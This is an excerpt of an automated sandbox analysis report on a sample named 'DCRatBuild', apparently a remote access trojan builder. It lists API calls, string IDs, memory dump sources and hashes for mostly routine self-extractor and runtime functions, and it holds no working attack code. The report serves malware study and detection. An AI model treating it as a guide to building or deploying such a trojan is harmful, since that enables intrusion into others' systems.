                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 7a37847253f4140458d0316212d65ad204ace28ce0e023c2509eea0ad7091256
                                  • Instruction ID: de11c4aea524d11cd78e13008af5c8d6e3fdc2d01877c2d19f1da4c0b81ecbc0
                                  • Opcode Fuzzy Hash: 7a37847253f4140458d0316212d65ad204ace28ce0e023c2509eea0ad7091256
                                  • Instruction Fuzzy Hash: 5D11A27650010DFFCB11EFA8C842CEA3BA5FF14350B5180E5BA088B666DA31EA51DF86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ;%u$x%u$xc%u
                                  • API String ID: 0-2277559157
                                  • Opcode ID: d14f16d2cc620785cd5de5e9719ea099763d6b24584864c3807ea57d2fd001df
                                  • Instruction ID: 7436ab1e9057c09490dcc26a4e0531a9efc488414634cd2c7e8349b264654e6f
                                  • Opcode Fuzzy Hash: d14f16d2cc620785cd5de5e9719ea099763d6b24584864c3807ea57d2fd001df
                                  • Instruction Fuzzy Hash: F8F1D4716082455BDB25EF288895BEA7799FFB0300F08476FF985CB383DA64D944C7A2
                                  APIs
                                    • Part of subcall function 008D130B: GetDlgItem.USER32(00000000,00003021), ref: 008D134F
                                    • Part of subcall function 008D130B: SetWindowTextW.USER32(00000000,009035B4), ref: 008D1365
                                  • EndDialog.USER32(?,00000001), ref: 008EAD20
                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 008EAD47
                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 008EAD60
                                  • SetWindowTextW.USER32(?,?), ref: 008EAD71
                                  • GetDlgItem.USER32(?,00000065), ref: 008EAD7A
                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 008EAD8E
                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 008EADA4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: MessageSend$Item$TextWindow$Dialog
                                  • String ID: LICENSEDLG
                                  • API String ID: 3214253823-2177901306
                                  • Opcode ID: 95aef913b60c80b599af661fbe809ad3c5f4d8a08bcaa2736c36237a3dcbce63
                                  • Instruction ID: c605b0ab5e37a7cf89d81c9ddbd10ccf72e746da5d7bb1c5aa10b17b5818382e
                                  • Opcode Fuzzy Hash: 95aef913b60c80b599af661fbe809ad3c5f4d8a08bcaa2736c36237a3dcbce63
                                  • Instruction Fuzzy Hash: E221D631758144BBD2295F76ED49E7B3B6CFB4BF46F014014F644E25A0CB626901FA32
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008D9448
                                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 008D946B
                                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 008D948A
                                    • Part of subcall function 008E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008DBB05,00000000,.exe,?,?,00000800,?,?,008E85DF,?), ref: 008E17C2
                                  • _swprintf.LIBCMT ref: 008D9526
                                    • Part of subcall function 008D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D401D
                                  • MoveFileW.KERNEL32(?,?), ref: 008D9595
                                  • MoveFileW.KERNEL32(?,?), ref: 008D95D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                  • String ID: rtmp%d
                                  • API String ID: 2111052971-3303766350
                                  • Opcode ID: fbade0f1ec1c6ab4455066d2077a6b108da4dc3f893eee7d14a2afe6a91a3e40
                                  • Instruction ID: dde74769593e5d6302660de64d0dcc98fbf60f01645d49966684180a87897ded
                                  • Opcode Fuzzy Hash: fbade0f1ec1c6ab4455066d2077a6b108da4dc3f893eee7d14a2afe6a91a3e40
                                  • Instruction Fuzzy Hash: 23414F71900259A6CF20EB64DC85EDA737CFF15780F0046E6F589E3242EB74CB889B65
                                  APIs
                                  • __aulldiv.LIBCMT ref: 008E0A9D
                                    • Part of subcall function 008DACF5: GetVersionExW.KERNEL32(?), ref: 008DAD1A
                                  • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 008E0AC0
                                  • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 008E0AD2
                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 008E0AE3
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 008E0AF3
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 008E0B03
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 008E0B3D
                                  • __aullrem.LIBCMT ref: 008E0BCB
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                  • String ID:
                                  • API String ID: 1247370737-0
                                  • Opcode ID: a91bc5a6209c317d147252691f6f2700a646d296bdaac916110c9d7a0410932e
                                  • Instruction ID: a164c35b9c8a249caa89ac973615131126bba68e7accd724152a3d1584ea58a9
                                  • Opcode Fuzzy Hash: a91bc5a6209c317d147252691f6f2700a646d296bdaac916110c9d7a0410932e
                                  • Instruction Fuzzy Hash: 5C4127B1408346AFC310DF65C88096BBBF8FB88714F004E2EF596D2650E778E589DB52
                                  APIs
                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,008FF5A2,?,00000000,?,00000000,00000000), ref: 008FEE6F
                                  • __fassign.LIBCMT ref: 008FEEEA
                                  • __fassign.LIBCMT ref: 008FEF05
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 008FEF2B
                                  • WriteFile.KERNEL32(?,?,00000000,008FF5A2,00000000,?,?,?,?,?,?,?,?,?,008FF5A2,?), ref: 008FEF4A
                                  • WriteFile.KERNEL32(?,?,00000001,008FF5A2,00000000,?,?,?,?,?,?,?,?,?,008FF5A2,?), ref: 008FEF83
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                  • String ID:
                                  • API String ID: 1324828854-0
                                  • Opcode ID: e596d84ef336cb89093cd2c3a7f2ec13f4fe52b875e91d7387aaaf90c520fb10
                                  • Instruction ID: 366a49d01929a76e1d2771af6a495d36ec1344ac03646a9fabe57d38e6acbab1
                                  • Opcode Fuzzy Hash: e596d84ef336cb89093cd2c3a7f2ec13f4fe52b875e91d7387aaaf90c520fb10
                                  • Instruction Fuzzy Hash: EE519171A0424D9FDB10CFA8D845AFEBBB9FF09310F14455AEA55E72A1DA309A40CB61
                                  APIs
                                  • GetTempPathW.KERNEL32(00000800,?), ref: 008EC54A
                                  • _swprintf.LIBCMT ref: 008EC57E
                                    • Part of subcall function 008D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D401D
                                  • SetDlgItemTextW.USER32(?,00000066,0091946A), ref: 008EC59E
                                  • _wcschr.LIBVCRUNTIME ref: 008EC5D1
                                  • EndDialog.USER32(?,00000001), ref: 008EC6B2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                  • String ID: %s%s%u
                                  • API String ID: 2892007947-1360425832
                                  • Opcode ID: 82bba880f39753d972721aa1ca526eb673bbe9dadc69d43074f74263ea14b9db
                                  • Instruction ID: 77673bf022eabef222090f73b0df3c8bc9afb0a3552f10f569144fa11b3390e2
                                  • Opcode Fuzzy Hash: 82bba880f39753d972721aa1ca526eb673bbe9dadc69d43074f74263ea14b9db
                                  • Instruction Fuzzy Hash: 974111B1D0065CAADF26DBA5CC45EEA37BCFF09305F0080A6E509E60A0E7709BC4CB51
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 008E8F38
                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 008E8F59
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AllocByteCharGlobalMultiWide
                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                  • API String ID: 3286310052-4209811716
                                  • Opcode ID: 4968ab337847be023f699b5a29289a29fe69a544b97921e5bde8dfe2efac2244
                                  • Instruction ID: 8448fd347965fb8be0fac29e5f8c4e9596f47e351b30391ff9053e101631fe9f
                                  • Opcode Fuzzy Hash: 4968ab337847be023f699b5a29289a29fe69a544b97921e5bde8dfe2efac2244
                                  • Instruction Fuzzy Hash: 64314A31508355BFD711AB399C02FBF7798FF86720F000119F905E61D1EF649A0883A2
                                  APIs
                                  • ShowWindow.USER32(?,00000000), ref: 008E964E
                                  • GetWindowRect.USER32(?,00000000), ref: 008E9693
                                  • ShowWindow.USER32(?,00000005,00000000), ref: 008E972A
                                  • SetWindowTextW.USER32(?,00000000), ref: 008E9732
                                  • ShowWindow.USER32(00000000,00000005), ref: 008E9748
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Window$Show$RectText
                                  • String ID: RarHtmlClassName
                                  • API String ID: 3937224194-1658105358
                                  • Opcode ID: b8f211fb0a6475a0e2ac38ba5a78bb8da82f158224f41b9b23339db196c53545
                                  • Instruction ID: 8b6c6fce5ddcde2e212b1e4e1ebf1253b4be1c4efe85e9c37b249a4622ad9012
                                  • Opcode Fuzzy Hash: b8f211fb0a6475a0e2ac38ba5a78bb8da82f158224f41b9b23339db196c53545
                                  • Instruction Fuzzy Hash: 9131E131008244EFCB119FA5DD48B6B7BA8FF49301F004559FE89DA162DBB4D848DF61
                                  APIs
                                    • Part of subcall function 008FBF79: _free.LIBCMT ref: 008FBFA2
                                  • _free.LIBCMT ref: 008FC003
                                    • Part of subcall function 008F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?), ref: 008F84F4
                                    • Part of subcall function 008F84DE: GetLastError.KERNEL32(?,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?,?), ref: 008F8506
                                  • _free.LIBCMT ref: 008FC00E
                                  • _free.LIBCMT ref: 008FC019
                                  • _free.LIBCMT ref: 008FC06D
                                  • _free.LIBCMT ref: 008FC078
                                  • _free.LIBCMT ref: 008FC083
                                  • _free.LIBCMT ref: 008FC08E
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                  • Instruction ID: ac1b778986138efa55c76aa05c31c7e0221d98cfcfb5879c13b741e1f1e3b0d0
                                  • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                  • Instruction Fuzzy Hash: 2611EA72540B0DFAD620BBB4CC06FEBB799FF04700F508855B399E6552DF65A9048A92
                                  APIs
                                  • GetLastError.KERNEL32(?,?,008F20C1,008EFB12), ref: 008F20D8
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008F20E6
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008F20FF
                                  • SetLastError.KERNEL32(00000000,?,008F20C1,008EFB12), ref: 008F2151
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: f8021acf1519a705bc78580ae4d55e1a9dae75224471aa0b7ee084b3e6eddd36
                                  • Instruction ID: a0e6e4e81b13528c7b3661c2187064be2a143c0a07f185d4bb8c76289f042047
                                  • Opcode Fuzzy Hash: f8021acf1519a705bc78580ae4d55e1a9dae75224471aa0b7ee084b3e6eddd36
                                  • Instruction Fuzzy Hash: 0F01D43321D31DAEE7642BB9BC8553A3A58FB217787210B29F310D51E0EF125C55A148
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                  • API String ID: 0-1718035505
                                  • Opcode ID: b9873f42f352d0601b57c6be406d7fff8c57361e5dca5ec2fdddba49f01c91de
                                  • Instruction ID: 69305c8e2b875956ee930ebefc7cb327b54e240fb2d59255455c8eda47cbb830
                                  • Opcode Fuzzy Hash: b9873f42f352d0601b57c6be406d7fff8c57361e5dca5ec2fdddba49f01c91de
                                  • Instruction Fuzzy Hash: 2B012D327563626F8F205F765C952E72398FB83396330523AE581D3350DA91C84EEAA0
                                  APIs
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 008E0D0D
                                    • Part of subcall function 008DACF5: GetVersionExW.KERNEL32(?), ref: 008DAD1A
                                  • LocalFileTimeToFileTime.KERNEL32(?,008E0CB8), ref: 008E0D31
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 008E0D47
                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 008E0D56
                                  • SystemTimeToFileTime.KERNEL32(?,008E0CB8), ref: 008E0D64
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 008E0D72
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Time$File$System$Local$SpecificVersion
                                  • String ID:
                                  • API String ID: 2092733347-0
                                  • Opcode ID: 71707c8094a0449fe3be2b1968e72e07b7355ea61185d1fd1b2697d3edb1b4f4
                                  • Instruction ID: f5f6e8fc06b1c7296be7ef694ce6c5915b561d1dedd70d0c0eb267c823fb9291
                                  • Opcode Fuzzy Hash: 71707c8094a0449fe3be2b1968e72e07b7355ea61185d1fd1b2697d3edb1b4f4
                                  • Instruction Fuzzy Hash: C831F57A91424EAECB00DFE5C8859EEBBBCFF58300B04451AE955E3210E730AA85CB65
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: _memcmp
                                  • String ID:
                                  • API String ID: 2931989736-0
                                  • Opcode ID: 48ead57e3c16e18796d71191b493d26b79eb34665f9f13eecadbc2be639bda5b
                                  • Instruction ID: 7d1b2eb319213269b8e3628bebd1b0f7742eb02f6a37c77cfb1e5ddaa5fe042e
                                  • Opcode Fuzzy Hash: 48ead57e3c16e18796d71191b493d26b79eb34665f9f13eecadbc2be639bda5b
                                  • Instruction Fuzzy Hash: E021E27260424EBBDB049F16CC81E7B77ADFB92788B148128FD49DB242E2B0ED418791
                                  APIs
                                  • GetLastError.KERNEL32(?,00910EE8,008F3E14,00910EE8,?,?,008F3713,00000050,?,00910EE8,00000200), ref: 008F8FA9
                                  • _free.LIBCMT ref: 008F8FDC
                                  • _free.LIBCMT ref: 008F9004
                                  • SetLastError.KERNEL32(00000000,?,00910EE8,00000200), ref: 008F9011
                                  • SetLastError.KERNEL32(00000000,?,00910EE8,00000200), ref: 008F901D
                                  • _abort.LIBCMT ref: 008F9023
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ErrorLast$_free$_abort
                                  • String ID:
                                  • API String ID: 3160817290-0
                                  • Opcode ID: a278ab4abd7a631537f93aa88263cc3918c867d790c6b4aeb68e79c915b55f2e
                                  • Instruction ID: e6b365ae3cff96732701870fc9a42749e9bf0353d308cb244811108cb4419b93
                                  • Opcode Fuzzy Hash: a278ab4abd7a631537f93aa88263cc3918c867d790c6b4aeb68e79c915b55f2e
                                  • Instruction Fuzzy Hash: 91F0C836509A09FFC711333D6C0AB3B296AFFD5774F350114F715D2192EE21C9026916
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 008ED2F2
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008ED30C
                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008ED31D
                                  • TranslateMessage.USER32(?), ref: 008ED327
                                  • DispatchMessageW.USER32(?), ref: 008ED331
                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 008ED33C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
